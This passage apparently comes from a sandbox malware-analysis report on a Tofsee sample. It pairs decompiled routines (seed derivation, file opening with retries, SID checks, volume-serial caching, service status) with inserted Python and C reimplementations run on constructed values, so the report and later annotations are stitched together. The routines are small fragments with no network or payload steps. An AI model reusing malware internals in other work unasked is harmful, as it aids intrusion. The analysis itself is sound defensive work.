                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
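Added example, not code from the report or from the sample: a Python reimplementation of the arithmetic in E0040EC54, so the value the routine stores at 0x4136cc can be recomputed from a volume serial number, a timestamp and an uptime taken from a memory dump or from the sandbox's API log. The report does not say what the global is used for; the shape of the routine (time, volume serial and tick count XORed together and masked to 31 bits) is the usual PRNG-seed derivation, and that reading is an inference, not something the page states. The XOR mixing is invertible, so the example also shows how to recover the tick count's low 31 bits from a known seed plus the other two inputs. All sample values are constructed.

```python
from datetime import datetime, timedelta, timezone

# 1601-01-01 to 1970-01-01 in 100 ns units (Windows FILETIME epoch offset).
FILETIME_UNIX_EPOCH = 116444736000000000
SEED_MASK = 0x7FFFFFFF  # the "& 0x7fffffff" in E0040EC54


def filetime_from_unix(unix_seconds):
    """Unix seconds (int) -> 64-bit FILETIME (100 ns since 1601-01-01 UTC)."""
    return unix_seconds * 10_000_000 + FILETIME_UNIX_EPOCH


def filetime_from_utc(dt):
    """Aware UTC datetime -> FILETIME, using integer arithmetic only."""
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    unix_seconds = (dt - epoch) // timedelta(seconds=1)
    return filetime_from_unix(unix_seconds)


def filetime_high(ft):
    """dwHighDateTime: the upper 32 bits of a FILETIME (the only part the sample uses)."""
    return (ft >> 32) & 0xFFFFFFFF


def tofsee_seed(filetime_high_dword, volume_serial, tick_count):
    """Exactly the expression in E0040EC54:
    (GetTickCount() ^ dwHighDateTime ^ volume_serial) & 0x7fffffff."""
    return (tick_count ^ filetime_high_dword ^ volume_serial) & SEED_MASK


def seed_from_unix(unix_seconds, volume_serial, tick_count):
    """Convenience wrapper: derive the value from a Unix timestamp instead of a FILETIME."""
    return tofsee_seed(filetime_high(filetime_from_unix(unix_seconds)), volume_serial, tick_count)


def invert_seed(seed, filetime_high_dword, volume_serial):
    """Given the stored value and two of the three inputs, the low 31 bits of the
    third follow directly because XOR is its own inverse; only bit 31, which the
    mask discards, is unknown, so two candidates are returned."""
    low31 = (seed ^ filetime_high_dword ^ volume_serial) & SEED_MASK
    return (low31, low31 | 0x80000000)


if __name__ == "__main__":
    # Constructed inputs: a timestamp, a made-up volume serial, a made-up uptime (ms).
    when = datetime(2022, 6, 20, 12, 0, 0, tzinfo=timezone.utc)
    serial = 0x1A2B3C4D
    ticks = 0x0012D687
    high = filetime_high(filetime_from_utc(when))
    seed = tofsee_seed(high, serial, ticks)
    print(f"dwHighDateTime=0x{high:08x} seed=0x{seed:08x}")
    print("tick candidates:", [hex(t) for t in invert_seed(seed, high, serial)])
```

Practical use: the sandbox's API log gives the call order (GetSystemTimeAsFileTime, GetVolumeInformationA, GetTickCount) and the analysis time, and the volume serial of the analysis VM is constant, so only the tick count is unknown when reproducing the global from a dump; because GetTickCount is milliseconds since boot, that unknown is small, and the mixing adds nothing beyond those three inputs.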

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                  control_flow_graph 452 404000-404008 453 40400b-40402a CreateFileA 452->453 454 404057 453->454 455 40402c-404035 GetLastError 453->455 458 404059-40405c 454->458 456 404052 455->456 457 404037-40403a 455->457 460 404054-404056 456->460 457->456 459 40403c-40403f 457->459 458->460 459->458 461 404041-404050 Sleep 459->461 461->453 461->456
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404000(CHAR* _a4, signed int* _a8) {
                                                                                                                                  				void* _t3;
                                                                                                                                  				long _t6;
                                                                                                                                  				void* _t8;
                                                                                                                                  				signed int* _t9;
                                                                                                                                  
                                                                                                                                  				_t9 = _a8;
                                                                                                                                  				_t8 = 0;
                                                                                                                                  				 *_t9 =  *_t9 | 0xffffffff;
                                                                                                                                  				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed; GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_FLAG_OVERLAPPED|FILE_ATTRIBUTE_NORMAL
					if(_t3 != 0xffffffff) {
						break; // handle obtained
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) { // ERROR_FILE_NOT_FOUND / ERROR_PATH_NOT_FOUND: give up at once
						L6:
						return 0;
					} else {
						if(_t6 == 5) { // ERROR_ACCESS_DENIED: reports success although *_a8 is still -1
							L9:
							return 1;
						}
						Sleep(0x1f4); // 500 ms between attempts
						_t8 = _t8 + 1;
						if(_t8 < 0xa) { // at most 10 attempts for any other error
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				 *_t9 = _t3;
                                                                                                                                  				goto L9;
			}

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
                                                                                                                                  • GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
                                                                                                                                  • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 408151869-0
                                                                                                                                  • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                                                                  • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
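Added example, not code from the report or from the sample: a Python model of the open-with-retry routine decompiled as E00404000, with the raw CreateFileA arguments decoded and the opener made pluggable (a hypothetical callable, not a Windows API) so the decision tree can be run offline against constructed error sequences. Two details worth checking in the model: ERROR_ACCESS_DENIED returns 1 without a valid handle, and a file that never opens because of some other error returns the same 0 as a missing file, only after ten attempts and about five seconds of sleeping. The FILE_FLAG_OVERLAPPED in the flags, together with the event from CreateEventA and the 0x7d0 (2000) value passed to the E00403F18/E00403F8C calls in the preceding function, is consistent with overlapped I/O with a timeout; the report does not state that, so treat it as an inference.

```python
# Windows constants as defined in the SDK headers.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x00000080
FILE_FLAG_OVERLAPPED = 0x40000000
INVALID_HANDLE_VALUE = 0xFFFFFFFF

ERROR_FILE_NOT_FOUND = 2
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_SHARING_VIOLATION = 32  # only used below as a constructed "retryable" error

# The literal arguments of the CreateFileA call in E00404000, decoded.
CREATEFILE_ARGS = {
    "dwDesiredAccess": GENERIC_READ | GENERIC_WRITE,                      # 0xc0000000
    "dwShareMode": FILE_SHARE_READ | FILE_SHARE_WRITE,                    # 3
    "dwCreationDisposition": OPEN_EXISTING,                               # 3
    "dwFlagsAndAttributes": FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,  # 0x40000080
}

MAX_ATTEMPTS = 10     # the "_t8 < 0xa" check
RETRY_DELAY_MS = 500  # Sleep(0x1f4)


def open_with_retry(path, opener, sleep=lambda ms: None):
    """Model of E00404000.

    opener(path) is a hypothetical stand-in for CreateFileA: it returns
    (handle, last_error), with handle == INVALID_HANDLE_VALUE on failure.
    Returns (status, handle, attempts): status is the function's return value
    (1 = "ok", 0 = give up) and handle is what the caller's out-parameter
    (_a8) would hold, which starts as INVALID_HANDLE_VALUE (*_t9 |= 0xffffffff).
    """
    handle = INVALID_HANDLE_VALUE
    attempts = 0
    while True:
        h, err = opener(path)
        attempts += 1
        if h != INVALID_HANDLE_VALUE:
            return 1, h, attempts                     # *_t9 = _t3; goto L9
        if err in (ERROR_FILE_NOT_FOUND, ERROR_PATH_NOT_FOUND):
            return 0, handle, attempts                # L6: nothing to open
        if err == ERROR_ACCESS_DENIED:
            return 1, handle, attempts                # L9 with the handle still invalid
        sleep(RETRY_DELAY_MS)
        if attempts >= MAX_ATTEMPTS:
            return 0, handle, attempts                # exhausted the 10 tries


def make_opener(errors, handle=0x1C8):
    """Constructed opener: fail with each error in `errors` in turn, then succeed
    with `handle` (a made-up value)."""
    pending = list(errors)

    def opener(path):
        if pending:
            return INVALID_HANDLE_VALUE, pending.pop(0)
        return handle, 0

    return opener


if __name__ == "__main__":
    slept = []
    print(open_with_retry("C:\\x", make_opener([ERROR_SHARING_VIOLATION] * 2), sleep=slept.append), slept)
    print(open_with_retry("C:\\x", make_opener([ERROR_ACCESS_DENIED])))
    print(open_with_retry("C:\\x", make_opener([ERROR_SHARING_VIOLATION] * 10)))
```

When reading callers of E00404000 in the rest of the decompilation, a return of 1 therefore has to be paired with a check of the out-parameter before the handle is used; the model makes that branch explicit so it is easy to see which paths in the caller would act on an invalid handle.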

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                  control_flow_graph 475 416930-41697d 477 4169ab-4169bb call 40c125 475->477 478 4169c0-4169ca 477->478 479 4169d4-4169e7 478->479 480 4169cc-4169cf 478->480 482 4169f2-4169ff 479->482 481 416dba-416dcb 480->481 483 416a01-416a5d 482->483 484 416a5f-416a65 482->484 483->482 486 416c63-416c79 484->486 487 416a6b-416a6f 484->487 490 416dab-416db8 486->490 491 416c7f-416c94 486->491 487->486 489 416a75-416a96 487->489 492 416aa3 489->492 493 416a98-416aa1 489->493 490->481 494 416ca2-416cad 491->494 495 416c96-416c9c 491->495 496 416aad-416abd 492->496 493->496 499 416cbb-416cc8 494->499 500 416caf-416cb9 494->500 495->494 498 416d94-416da3 495->498 501 416ac8-416ad1 496->501 502 416da6 498->502 503 416cce-416ce2 499->503 500->503 504 416b93-416b9a 501->504 505 416ad7-416af6 501->505 502->490 510 416d79-416d8c 503->510 511 416ce8-416cec 503->511 506 416bb7-416bbd 504->506 512 416b05-416b1f 505->512 513 416af8-416b00 505->513 506->486 509 416bc3-416bc9 506->509 514 416bcf-416bd5 509->514 515 416c5e 509->515 520 416d92 510->520 511->510 516 416cf2-416d03 511->516 517 416b2a-416b3c 512->517 513->504 514->515 519 416bdb-416be4 514->519 515->506 516->510 530 416d05-416d19 516->530 521 416b8e 517->521 522 416b3e-416b8c 517->522 519->515 523 416be6-416bef 519->523 520->502 521->501 522->517 527 416c01-416c45 call 41bc00 523->527 528 416bf1-416bff 523->528 535 416c47-416c4a 527->535 536 416c4f-416c5b 527->536 528->515 528->527 533 416d1b-416d2b 530->533 534 416d2d-416d39 530->534 537 416d4b-416d61 call 41bc00 533->537 534->537 538 416d3b-416d48 534->538 535->481 536->515 541 416d63-416d66 537->541 542 416d68-416d77 537->542 538->537 541->481 542->520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77f48a102cc0ea0eb36cfa460e3e427b31ec91d7791bfc084f338b5a15b1cc85
                                                                                                                                  • Instruction ID: 09d6e81fcf76da4e43cf60b9f69bcbf2c181d9feaad62054433ac42e5f9b529a
                                                                                                                                  • Opcode Fuzzy Hash: 77f48a102cc0ea0eb36cfa460e3e427b31ec91d7791bfc084f338b5a15b1cc85
                                                                                                                                  • Instruction Fuzzy Hash: 7BE10B74E04248CFDB24CFA8C894BADBBB1FB49314F25825ED8656B392D7359882CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 544 406e36-406e5d GetUserNameW 545 406ebe-406ec2 544->545 546 406e5f-406e95 LookupAccountNameW 544->546 546->545 547 406e97-406e9b 546->547 548 406ebb-406ebd 547->548 549 406e9d-406ea3 547->549 548->545 549->548 550 406ea5-406eaa 549->550 551 406eb7-406eb9 550->551 552 406eac-406eb0 550->552 551->545 552->548 553 406eb2-406eb5 552->553 553->548 553->551
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406E36(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				union _SID_NAME_USE _v16;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				intOrPtr _v76;
                                                                                                                                  				void _v84;
                                                                                                                                  				short _v340;
                                                                                                                                  				short _v860;
                                                                                                                                  				int _t20;
                                                                                                                                  				int _t28;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				signed int _t31;
                                                                                                                                  				signed int _t32;
                                                                                                                                  
                                                                                                                                   				_t32 = _t31 | 0xffffffff;                       // default result: -1 (a lookup failed)
                                                                                                                                   				_v8 = 0x104;                                    // size of the user-name buffer, in characters
                                                                                                                                   				_t20 = GetUserNameW( &_v860,  &_v8); // executed
                                                                                                                                   				if(_t20 != 0) {
                                                                                                                                   					_v8 = 0x7c;                                 // cbSid: size of the SID buffer _v84
                                                                                                                                   					_v12 = 0x80;                                // cchReferencedDomainName: size of _v340
                                                                                                                                   					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
                                                                                                                                   					if(_t28 != 0) {
                                                                                                                                   						// _v84 holds the account SID; _v76 = SID+8 = SubAuthority[0], _v60 = SID+24 = SubAuthority[4]
                                                                                                                                   						// (for an S-1-5-21-x-y-z-RID account, SubAuthority[4] is the RID); _v8 is treated as the SID length
                                                                                                                                   						if(_v8 < 0xc || _v76 != _a4) {              // no SubAuthority[0] present, or it differs from _a4
                                                                                                                                   							L8:
                                                                                                                                   							_t32 = 1;                               // no match
                                                                                                                                   						} else {
                                                                                                                                   							_t30 = _a8;
                                                                                                                                   							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) { // _a8 == 0: only SubAuthority[0] is checked; otherwise SubAuthority[4] must equal _a8
                                                                                                                                   								_t32 = 0;                           // match
                                                                                                                                   							} else {
                                                                                                                                   								goto L8;
                                                                                                                                   							}
                                                                                                                                   						}
                                                                                                                                   					}
                                                                                                                                   				}
                                                                                                                                   				return _t32;
                                                                                                                                   			}
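The following is an added example and not code from this report or from the sample: a portable re-implementation of the comparison E00406E36 performs once it has the caller's SID, run against SID byte strings constructed here so it executes off-Windows. The Windows lookups (GetUserNameW, LookupAccountNameW) are replaced by passing the SID buffer in directly; the offsets 8 and 24 and the length thresholds 0xc and 0x1c are taken from the decompiled code, while the example SIDs (a local account S-1-5-21-1111-2222-3333-1001 and LOCAL SYSTEM S-1-5-18) and all helper names are this example's own assumptions. Which _a4/_a8 values the sample actually passes is not visible in this part of the report.

```c
/* Added example: portable equivalent of the SID check in E00406E36.
 * Not the sample's code; SIDs below are constructed for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* SID layout (winnt.h): Revision(1), SubAuthorityCount(1),
 * IdentifierAuthority(6), then SubAuthority[] of 4-byte values.
 * SubAuthority[0] is at byte 8 (_v76 in the decompiled code) and
 * SubAuthority[4] at byte 24 (_v60). */
#define SID_HEADER_LEN 8u

static uint32_t rd32(const uint8_t *p)      /* little-endian read, alignment-safe */
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Equivalent of E00406E36(a4, a8) once the SID is known.
 * sid == NULL models GetUserNameW/LookupAccountNameW failing.
 * Returns 0 = match, 1 = mismatch, -1 = lookup failed. */
int sid_check(const uint8_t *sid, uint32_t cb_sid, uint32_t a4, uint32_t a8)
{
    if (sid == NULL)
        return -1;                                  /* _t32 stays 0xffffffff */
    if (cb_sid < 0x0c || rd32(sid + 8) != a4)       /* no SubAuthority[0], or it differs */
        return 1;
    if (a8 == 0)
        return 0;                                   /* only SubAuthority[0] was requested */
    if (cb_sid >= 0x1c && rd32(sid + 24) == a8)     /* SubAuthority[4]: the RID of S-1-5-21-x-y-z-RID */
        return 0;
    return 1;
}

/* Serialises S-1-5-<subs...> into out; returns the SID length in bytes. */
uint32_t build_nt_sid(uint8_t *out, const uint32_t *subs, uint8_t count)
{
    static const uint8_t nt_authority[6] = {0, 0, 0, 0, 0, 5};   /* SECURITY_NT_AUTHORITY */
    out[0] = 1;                                     /* SID_REVISION */
    out[1] = count;
    memcpy(out + 2, nt_authority, 6);
    for (uint8_t i = 0; i < count; i++) {
        uint32_t v = subs[i];
        uint8_t *p = out + SID_HEADER_LEN + 4u * i;
        p[0] = (uint8_t)v;        p[1] = (uint8_t)(v >> 8);
        p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
    }
    return SID_HEADER_LEN + 4u * count;
}

/* Constructed account: S-1-5-21-1111-2222-3333-1001 (a local user, RID 1001). */
int check_constructed_user(uint32_t a4, uint32_t a8)
{
    static const uint32_t subs[5] = {21, 1111, 2222, 3333, 1001};
    uint8_t sid[32];
    uint32_t cb = build_nt_sid(sid, subs, 5);       /* 28 bytes == 0x1c */
    return sid_check(sid, cb, a4, a8);
}

/* Constructed account: S-1-5-18 (LOCAL SYSTEM), too short to have SubAuthority[4]. */
int check_constructed_system(uint32_t a4, uint32_t a8)
{
    static const uint32_t subs[1] = {18};
    uint8_t sid[32];
    uint32_t cb = build_nt_sid(sid, subs, 1);       /* 12 bytes == 0x0c */
    return sid_check(sid, cb, a4, a8);
}

int main(void)
{
    printf("user   vs (21, 1001): %d\n", check_constructed_user(21, 1001));   /* 0 */
    printf("user   vs (21,  500): %d\n", check_constructed_user(21, 500));    /* 1 */
    printf("user   vs (21,    0): %d\n", check_constructed_user(21, 0));      /* 0 */
    printf("system vs (18,    0): %d\n", check_constructed_system(18, 0));    /* 0 */
    printf("system vs (18,    7): %d\n", check_constructed_system(18, 7));    /* 1 */
    printf("lookup failure      : %d\n", sid_check(NULL, 0, 21, 0));          /* -1 */
    return 0;
}
```

Reading the result: 0 means the account matched both sub-authorities (or only the first, when _a8 is 0), 1 means no match, and -1 means the lookup itself failed. The comparison is on the account's own SID, not on group membership or token privileges, so an account that is in Administrators but carries a different RID still yields 1.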

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountLookupUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2370142434-0
                                                                                                                                  • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                                                                  • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 554 406dc2-406dd5 555 406e33-406e35 554->555 556 406dd7-406df1 call 406cc9 call 40ef00 554->556 561 406df4-406df9 556->561 561->561 562 406dfb-406e00 561->562 563 406e02-406e22 GetVolumeInformationA 562->563 564 406e24 562->564 563->564 565 406e2e 563->565 564->565 565->555
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406DC2(void* __ecx) {
                                                                                                                                  				char _v261;
                                                                                                                                  				char _v264;
                                                                                                                                  				long _t6;
                                                                                                                                  				intOrPtr* _t10;
                                                                                                                                  				int _t13;
                                                                                                                                  				intOrPtr _t20;
                                                                                                                                  				void* _t21;
                                                                                                                                  
                                                                                                                                   				_t6 =  *0x412f0c; // 0x50e39a9a             cached volume serial; the value is what the dump held at 0x412f0c
                                                                                                                                   				if(_t6 == 0) {                                  // not computed yet
                                                                                                                                   					E0040EF00( &_v264, E00406CC9(__ecx));       // copy the system-directory path into _v264 (E00406CC9 calls GetSystemDirectoryA/GetWindowsDirectoryA; E0040EF00 appears to be a string copy)
                                                                                                                                   					_t10 =  &_v264;
                                                                                                                                   					_t21 = _t10 + 1;
                                                                                                                                   					do {                                        // inline strlen
                                                                                                                                   						_t20 =  *_t10;
                                                                                                                                   						_t10 = _t10 + 1;
                                                                                                                                   					} while (_t20 != 0);
                                                                                                                                   					if(_t10 - _t21 < 3) {                       // path shorter than "X:\"
                                                                                                                                   						L5:
                                                                                                                                   						 *0x412f0c = 0x5e5e5e5e;                // fallback when no serial can be read
                                                                                                                                   					} else {
                                                                                                                                   						_v261 = 0;                              // _v264 + 3: truncate to the drive root, e.g. "C:\", the form GetVolumeInformationA expects
                                                                                                                                   						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed; the serial is written straight into the global
                                                                                                                                   						if(_t13 == 0) {
                                                                                                                                   							goto L5;
                                                                                                                                   						}
                                                                                                                                   					}
                                                                                                                                   					_t6 =  *0x412f0c; // 0x50e39a9a
                                                                                                                                   				}
                                                                                                                                   				return _t6;
                                                                                                                                   			}
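An added example, not from the report or the sample: the serial lookup of E00406DC2 rewritten with a pluggable query function in place of GetVolumeInformationA, so the three paths in the decompiled code (path too short, query failure, cached value) can be exercised off-Windows. The truncation at index 3, the cache global and the 0x5e5e5e5e fallback come from the decompiled code; the stub query functions, the 264-byte buffer size and the serial value 0x50e39a9a (the value the dump shows at 0x412f0c) are this example's assumptions.

```c
/* Added example: portable equivalent of E00406DC2 with GetVolumeInformationA
 * replaced by a caller-supplied query function. Not the sample's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FALLBACK_SERIAL 0x5e5e5e5eu      /* sentinel stored when no serial can be read */

/* Models the single use the sample makes of GetVolumeInformationA:
 * root path in, serial out, non-zero on success. */
typedef int (*volume_query_fn)(const char *root, uint32_t *serial);

static uint32_t g_cached_serial;         /* stands in for the global at 0x412f0c */

/* Equivalent of E00406DC2. sysdir is what E00406CC9 returns, the system
 * directory (the report shows "C:\Windows\SysWOW64\"). */
uint32_t volume_id(const char *sysdir, volume_query_fn query)
{
    if (g_cached_serial != 0)
        return g_cached_serial;          /* computed once, then cached */

    char root[264];                      /* assumed size of the _v264 buffer */
    strncpy(root, sysdir, sizeof root - 1);
    root[sizeof root - 1] = '\0';

    if (strlen(root) < 3) {              /* shorter than "X:\" */
        g_cached_serial = FALLBACK_SERIAL;
    } else {
        root[3] = '\0';                  /* "C:\Windows\..." -> "C:\" */
        if (!query(root, &g_cached_serial))
            g_cached_serial = FALLBACK_SERIAL;
    }
    return g_cached_serial;
}

void reset_cache(void) { g_cached_serial = 0; }  /* test helper; the sample has none */

/* Constructed stand-ins for GetVolumeInformationA. */
static int query_ok(const char *root, uint32_t *serial)
{
    if (strcmp(root, "C:\\") != 0)       /* only the root form is accepted */
        return 0;
    *serial = 0x50e39a9a;                /* serial seen in the sandbox dump */
    return 1;
}
static int query_fail(const char *root, uint32_t *serial)
{
    (void)root; (void)serial;
    return 0;
}

/* Scenarios, each starting from an empty cache. */
uint32_t demo_success(void)    { reset_cache(); return volume_id("C:\\Windows\\SysWOW64\\", query_ok); }
uint32_t demo_failure(void)    { reset_cache(); return volume_id("C:\\Windows\\SysWOW64\\", query_fail); }
uint32_t demo_short_path(void) { reset_cache(); return volume_id("C", query_ok); }
uint32_t demo_cached(void)
{
    reset_cache();
    volume_id("C:\\Windows\\SysWOW64\\", query_ok);          /* fills the cache */
    return volume_id("C:\\Windows\\SysWOW64\\", query_fail); /* query not consulted again */
}

int main(void)
{
    printf("success    : 0x%08x\n", demo_success());     /* 0x50e39a9a */
    printf("failure    : 0x%08x\n", demo_failure());     /* 0x5e5e5e5e */
    printf("short path : 0x%08x\n", demo_short_path());  /* 0x5e5e5e5e */
    printf("cached     : 0x%08x\n", demo_cached());      /* 0x50e39a9a */
    return 0;
}
```

Two properties of the original logic carry over: the cache test is a comparison with 0, so a volume whose serial is genuinely 0 would be re-queried on every call, and the value is constant for a given volume, so reproducing the sample on another machine gives a different result unless the query is stubbed as above.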

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                    • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                    • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                    • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1823874839-0
                                                                                                                                  • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                                                                  • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 566 409892-4098c0 567 4098c2-4098c5 566->567 568 4098d9 566->568 567->568 569 4098c7-4098d7 567->569 570 4098e0-4098f1 SetServiceStatus 568->570 569->570
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _t6;
                                                                                                                                  				int _t7;
                                                                                                                                  				signed int _t8;
                                                                                                                                  
                                                                                                                                  				_t6 = _a4;
                                                                                                                                  				 *0x413398 = _t6;
                                                                                                                                  				 *0x41339c = 0 | _t6 != 0x00000002;
                                                                                                                                  				 *0x4133a0 = _a8;
                                                                                                                                  				 *0x4133ac = _a12;
                                                                                                                                  				if(_t6 == 4 || _t6 == 1) {
                                                                                                                                  					 *0x4133a8 =  *0x4133a8 & 0x00000000;
                                                                                                                                  				} else {
                                                                                                                                  					_t8 =  *0x41204c; // 0x2
                                                                                                                                  					 *0x41204c =  *0x41204c + 1;
                                                                                                                                  					 *0x4133a8 = _t8;
                                                                                                                                  				}
                                                                                                                                  				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed
                                                                                                                                  				return _t7;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
